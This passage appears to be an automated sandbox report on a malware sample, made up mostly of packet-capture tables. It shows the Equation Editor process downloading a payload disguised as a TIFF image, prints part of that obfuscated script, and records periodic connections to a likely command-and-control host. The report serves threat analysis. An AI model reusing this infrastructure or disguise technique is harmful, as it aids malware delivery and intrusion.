Sep 11, 2024 20:22:25.399995089 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.400017023 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.400038958 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.400077105 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.400177002 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.400188923 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.400199890 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.400212049 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.400223017 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.400223970 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.400233984 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.400245905 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.400249958 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.400258064 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.400274992 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.400294065 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.400376081 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.400387049 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.400398016 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.400422096 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.401614904 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.447210073 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447237968 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447251081 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447263002 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447274923 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447285891 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447305918 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447300911 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.447318077 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447329044 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447335005 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.447340965 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447351933 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447352886 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.447365999 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447371006 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.447400093 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.447413921 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447424889 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447458982 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.447527885 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447540045 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447550058 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447561979 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447566986 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.447573900 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447586060 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447597980 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.447598934 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.447621107 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.485397100 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.485439062 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.485450983 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.485455036 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.485479116 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.485491991 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.485495090 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.485505104 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.485517025 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.485531092 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.485531092 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486037970 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486063957 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.486078024 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.486083984 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486095905 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486130953 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.486196995 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486207962 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486221075 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486226082 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486232042 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486248970 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486273050 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.486335993 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486346960 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486357927 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486371040 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486377954 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.486383915 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486397028 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486406088 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.486408949 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486433983 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.486591101 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486602068 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486613035 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486634970 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486634970 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.486649036 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486664057 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486673117 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.486675978 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486695051 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.486768007 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486783981 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486798048 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486809969 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.486809969 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486824989 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486840010 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.486861944 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.486891985 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486911058 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486931086 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486944914 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486949921 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.486958027 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.486979961 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.487140894 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.487153053 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.487171888 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.487176895 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.487185001 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.487196922 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.487205029 CEST  49163        80         192.168.2.22   45.90.89.123
Sep 11, 2024 20:22:25.487210035 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.487221956 CEST  80           49163      45.90.89.123   192.168.2.22
Sep 11, 2024 20:22:25.487231016 CEST  49163        80         192.168.2.22   45.90.89.123
                                                Sep 11, 2024 20:22:25.487235069 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487247944 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487257004 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487262011 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487273932 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487283945 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487287045 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487306118 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487329960 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487488985 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487500906 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487513065 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487519979 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487554073 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487603903 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487616062 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487627983 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487639904 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487648964 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487673044 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487804890 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487817049 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487828970 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487840891 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487847090 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487853050 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487864017 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487870932 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487876892 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487889051 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487896919 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487900972 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487920046 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.488058090 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.488092899 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.488142014 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.488153934 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.488159895 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.488172054 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.488184929 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.488185883 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.488205910 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.618767977 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.664041042 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:25.670087099 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:25.670146942 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:25.677912951 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:25.682806969 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:29.654961109 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:29.656100035 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:29.656143904 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:29.656157017 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:29.656193972 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:29.661569118 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:29.666390896 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:29.666452885 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:29.671303034 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:30.415330887 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:30.417376041 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:30.422369957 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:30.602988005 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:30.755261898 CEST4916580192.168.2.22178.237.33.50
                                                Sep 11, 2024 20:22:30.760199070 CEST8049165178.237.33.50192.168.2.22
                                                Sep 11, 2024 20:22:30.760271072 CEST4916580192.168.2.22178.237.33.50
                                                Sep 11, 2024 20:22:30.763412952 CEST4916580192.168.2.22178.237.33.50
                                                Sep 11, 2024 20:22:30.768223047 CEST8049165178.237.33.50192.168.2.22
                                                Sep 11, 2024 20:22:30.812222958 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:30.812330008 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:31.382930040 CEST8049165178.237.33.50192.168.2.22
                                                Sep 11, 2024 20:22:31.383018017 CEST4916580192.168.2.22178.237.33.50
                                                Sep 11, 2024 20:22:31.432928085 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:31.438327074 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:32.650635004 CEST8049165178.237.33.50192.168.2.22
                                                Sep 11, 2024 20:22:32.650971889 CEST4916580192.168.2.22178.237.33.50
                                                Sep 11, 2024 20:22:32.651493073 CEST8049165178.237.33.50192.168.2.22
                                                Sep 11, 2024 20:22:32.651535034 CEST4916580192.168.2.22178.237.33.50
                                                Sep 11, 2024 20:22:44.106367111 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:44.108064890 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:44.108127117 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:44.108241081 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:44.113409042 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:23:13.858422041 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:23:13.863907099 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:23:13.868984938 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:23:33.288666964 CEST4916580192.168.2.22178.237.33.50
                                                Sep 11, 2024 20:23:33.293889999 CEST8049165178.237.33.50192.168.2.22
                                                Sep 11, 2024 20:23:43.858776093 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:23:43.860035896 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:23:43.865004063 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:24:13.859030008 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:24:13.860263109 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:24:13.865226984 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:24:44.050715923 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:24:44.052087069 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:24:44.061328888 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:25:14.255348921 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:25:14.256251097 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:25:14.256313086 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:25:14.256804943 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:25:14.263262033 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:25:43.891535044 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:25:43.893737078 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:25:43.898736000 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:26:13.906234026 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:26:13.914196968 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:26:13.919078112 CEST82434916445.90.89.98192.168.2.22
                                                TimestampSource PortDest PortSource IPDest IP
                                                Sep 11, 2024 20:22:20.641999960 CEST5456253192.168.2.228.8.8.8
                                                Sep 11, 2024 20:22:20.652302980 CEST53545628.8.8.8192.168.2.22
                                                Sep 11, 2024 20:22:30.736854076 CEST5291753192.168.2.228.8.8.8
                                                Sep 11, 2024 20:22:30.746052980 CEST53529178.8.8.8192.168.2.22
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Sep 11, 2024 20:22:20.641999960 CEST192.168.2.228.8.8.80xaccaStandard query (0)ia601706.us.archive.orgA (IP address)IN (0x0001)false
                                                Sep 11, 2024 20:22:30.736854076 CEST192.168.2.228.8.8.80x5bedStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Sep 11, 2024 20:22:20.652302980 CEST8.8.8.8192.168.2.220xaccaNo error (0)ia601706.us.archive.org207.241.227.96A (IP address)IN (0x0001)false
                                                Sep 11, 2024 20:22:30.746052980 CEST8.8.8.8192.168.2.220x5bedNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                • ia601706.us.archive.org
                                                • 45.90.89.123
                                                • geoplugin.net
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.224916145.90.89.123803340C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                TimestampBytes transferredDirectionData
                                                Sep 11, 2024 20:22:15.616658926 CEST343OUTGET /421/seennewthingsentireworldseethethings.tIF HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: 45.90.89.123
                                                Connection: Keep-Alive
                                                Sep 11, 2024 20:22:16.372056961 CEST1236INHTTP/1.1 200 OK
                                                Date: Wed, 11 Sep 2024 18:22:16 GMT
                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                Last-Modified: Tue, 10 Sep 2024 10:55:32 GMT
                                                ETag: "312a2-621c1b666d2a6"
                                                Accept-Ranges: bytes
                                                Content-Length: 201378
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: image/tiff
                                                Data Raw: ff fe 4c 00 4c 00 62 00 5a 00 75 00 69 00 6b 00 69 00 52 00 4c 00 65 00 41 00 68 00 20 00 3d 00 20 00 22 00 7a 00 57 00 4c 00 64 00 52 00 66 00 4f 00 69 00 4c 00 69 00 68 00 47 00 51 00 22 00 0d 00 0a 00 66 00 78 00 57 00 6b 00 41 00 57 00 41 00 70 00 49 00 6b 00 57 00 47 00 70 00 20 00 3d 00 20 00 22 00 6f 00 4e 00 70 00 4b 00 62 00 65 00 62 00 74 00 67 00 6d 00 6b 00 4c 00 74 00 22 00 0d 00 0a 00 62 00 7a 00 70 00 6f 00 65 00 43 00 6b 00 75 00 4f 00 57 00 54 00 4a 00 42 00 20 00 3d 00 20 00 22 00 41 00 6c 00 4b 00 4c 00 63 00 4e 00 53 00 50 00 57 00 6e 00 4c 00 6d 00 75 00 22 00 0d 00 0a 00 4c 00 6b 00 55 00 70 00 62 00 65 00 6e 00 41 00 75 00 5a 00 52 00 7a 00 61 00 20 00 3d 00 20 00 22 00 70 00 4b 00 6c 00 68 00 4b 00 68 00 4c 00 55 00 6e 00 73 00 62 00 62 00 69 00 22 00 0d 00 0a 00 70 00 52 00 70 00 74 00 62 00 4c 00 41 00 4c 00 70 00 5a 00 66 00 4c 00 66 00 20 00 3d 00 20 00 22 00 47 00 55 00 48 00 48 00 61 00 54 00 47 00 4c 00 52 00 4b 00 47 00 67 00 55 00 22 00 0d 00 0a 00 6d 00 41 00 57 00 [TRUNCATED]
                                                Data Ascii: LLbZuikiRLeAh = "zWLdRfOiLihGQ"fxWkAWApIkWGp = "oNpKbebtgmkLt"bzpoeCkuOWTJB = "AlKLcNSPWnLmu"LkUpbenAuZRza = "pKlhKhLUnsbbi"pRptbLALpZfLf = "GUHHaTGLRKGgU"mAWZLijNANWcW = "WknhWcWKuLbqP"GGiZCfnpRofotaj = "piGWuKtGWfLWW"ZWNBZigfkgWOA = "ZkWWHdLLxTiUi"ePALJvLQWKAUj = "fKGUthKsBCbmL"ULcWLTZUkWNKn = "zaWLhndULhLit"WuGaicLNfKZpL = "bpoKiKchNAbcR"bHGgLRGPudtiO = "hcWKxGbdGLZoB"JhdUulLNseTWL = "otCULLLiGZQZI"SWNHeiNhoneWK = "SchKCvOGtQ
Sep 11, 2024 20:22:16.372076988 CEST  224  IN  Data Raw: 00 6b 00 54 00 4b 00 22 00 0d 00 0a 00 48 00 42 00 42 00 63 00 4f 00 69 00 54 00 68 00 75 00 4e 00 51 00 4c 00 66 00 20 00 3d 00 20 00 22 00 62 00 6b 00 5a 00 66 00 6f 00 64 00 4b 00 70 00 71 00 6b 00 70 00 41 00 57 00 22 00 0d 00 0a 00 4c 00 47
Data Ascii: kTK"HBBcOiThuNQLf = "bkZfodKpqkpAW"LGWLKbLbkNmSL = "LWkKLKpLboWKp"PLUGLWjiomTdW = "LLvLhpcWRLkKx"zWGadhZ
Sep 11, 2024 20:22:16.372087002 CEST  1236  IN  Data Raw: 00 4f 00 42 00 63 00 55 00 4f 00 6c 00 20 00 3d 00 20 00 22 00 49 00 47 00 62 00 57 00 4c 00 4c 00 65 00 67 00 6d 00 43 00 61 00 43 00 51 00 22 00 0d 00 0a 00 41 00 4e 00 61 00 55 00 57 00 69 00 41 00 41 00 41 00 4b 00 6b 00 47 00 55 00 20 00 3d
Data Ascii: OBcUOl = "IGbWLLegmCaCQ"ANaUWiAAAKkGU = "KGZKiZlPbvoWp"LLcLrJeiQJzBP = "gKZAfAKRKtbJi"NAbGkPCpGGLin = "QxWctinUdZ
Sep 11, 2024 20:22:16.372117996 CEST  1236  IN  Data Raw: 00 50 00 63 00 47 00 55 00 6f 00 22 00 0d 00 0a 00 62 00 57 00 55 00 42 00 57 00 4f 00 55 00 57 00 57 00 6f 00 47 00 50 00 68 00 20 00 3d 00 20 00 22 00 6b 00 67 00 61 00 57 00 69 00 7a 00 43 00 6f 00 43 00 5a 00 47 00 52 00 68 00 22 00 0d 00 0a
Data Ascii: PcGUo"bWUBWOUWWoGPh = "kgaWizCoCZGRh"AkWAkKJiGWlbK = "ZdclWbmLUmiuU"WKnWpKLmGuLLz = "GKUIpKknstuGp"bmKRbtLbcNuCP
Sep 11, 2024 20:22:16.372129917 CEST  1236  IN  Data Raw: 00 6b 00 20 00 3d 00 20 00 22 00 4c 00 57 00 4b 00 76 00 41 00 4c 00 55 00 41 00 65 00 52 00 70 00 4f 00 6a 00 22 00 0d 00 0a 00 75 00 57 00 69 00 78 00 4e 00 6a 00 69 00 68 00 6b 00 69 00 4f 00 4c 00 71 00 20 00 3d 00 20 00 22 00 64 00 62 00 57
Data Ascii: k = "LWKvALUAeRpOj"uWixNjihkiOLq = "dbWGtWaiLzWLr"LlcOjxUmQOUZZ = "cQPKKiIxLKfhh"KhxfotakNkdkBoZ = "LzuKdKjrWkxWr"
Sep 11, 2024 20:22:16.372142076 CEST  1236  IN  Data Raw: 00 68 00 6b 00 22 00 0d 00 0a 00 4b 00 6f 00 70 00 78 00 68 00 4c 00 63 00 72 00 73 00 72 00 65 00 71 00 63 00 20 00 3d 00 20 00 22 00 47 00 4a 00 62 00 57 00 69 00 70 00 57 00 61 00 6c 00 62 00 6b 00 6b 00 6e 00 22 00 0d 00 0a 00 47 00 6c 00 57
Data Ascii: hk"KopxhLcrsreqc = "GJbWipWalbkkn"GlWLKAGTfKzBe = "LLTmviWeehkok"WGiRPiSmSlkGW = "mNRczOLJWCncG"bphOimkLNWLfq = "
Sep 11, 2024 20:22:16.372255087 CEST  1236  IN  Data Raw: 00 61 00 4c 00 20 00 3d 00 20 00 22 00 55 00 4c 00 62 00 69 00 65 00 61 00 43 00 6a 00 4b 00 63 00 48 00 48 00 47 00 22 00 0d 00 0a 00 4c 00 70 00 6f 00 4a 00 62 00 68 00 78 00 6a 00 4a 00 63 00 70 00 69 00 47 00 20 00 3d 00 20 00 22 00 4b 00 74
Data Ascii: aL = "ULbieaCjKcHHG"LpoJbhxjJcpiG = "KtOLLLxdLiUub"PbcceWefZKGKh = "glfotaAmpWCiGlc"WSuiWctkGTvpO = "qJsfkcWxidKGW"
Sep 11, 2024 20:22:16.372267008 CEST  552  IN  Data Raw: 00 47 00 4c 00 65 00 22 00 0d 00 0a 00 6e 00 61 00 74 00 43 00 7a 00 6a 00 69 00 63 00 41 00 4f 00 5a 00 4b 00 74 00 20 00 3d 00 20 00 22 00 50 00 52 00 4c 00 42 00 65 00 6e 00 69 00 63 00 48 00 4e 00 70 00 50 00 69 00 22 00 0d 00 0a 00 52 00 6f
Data Ascii: GLe"natCzjicAOZKt = "PRLBenicHNpPi"RoGWiiGKLKGeG = "iGWOJLKzLNNAW"bltLNPfuUfWKi = "WAkNxteZBtWbi"UbWmWLlgRzvea =
Sep 11, 2024 20:22:16.372277975 CEST  1236  IN  Data Raw: 00 63 00 4e 00 62 00 47 00 47 00 6a 00 63 00 72 00 4c 00 20 00 3d 00 20 00 22 00 47 00 61 00 69 00 76 00 62 00 52 00 64 00 63 00 7a 00 63 00 57 00 4e 00 43 00 22 00 0d 00 0a 00 76 00 6b 00 65 00 54 00 6e 00 64 00 71 00 4e 00 66 00 47 00 4c 00 69
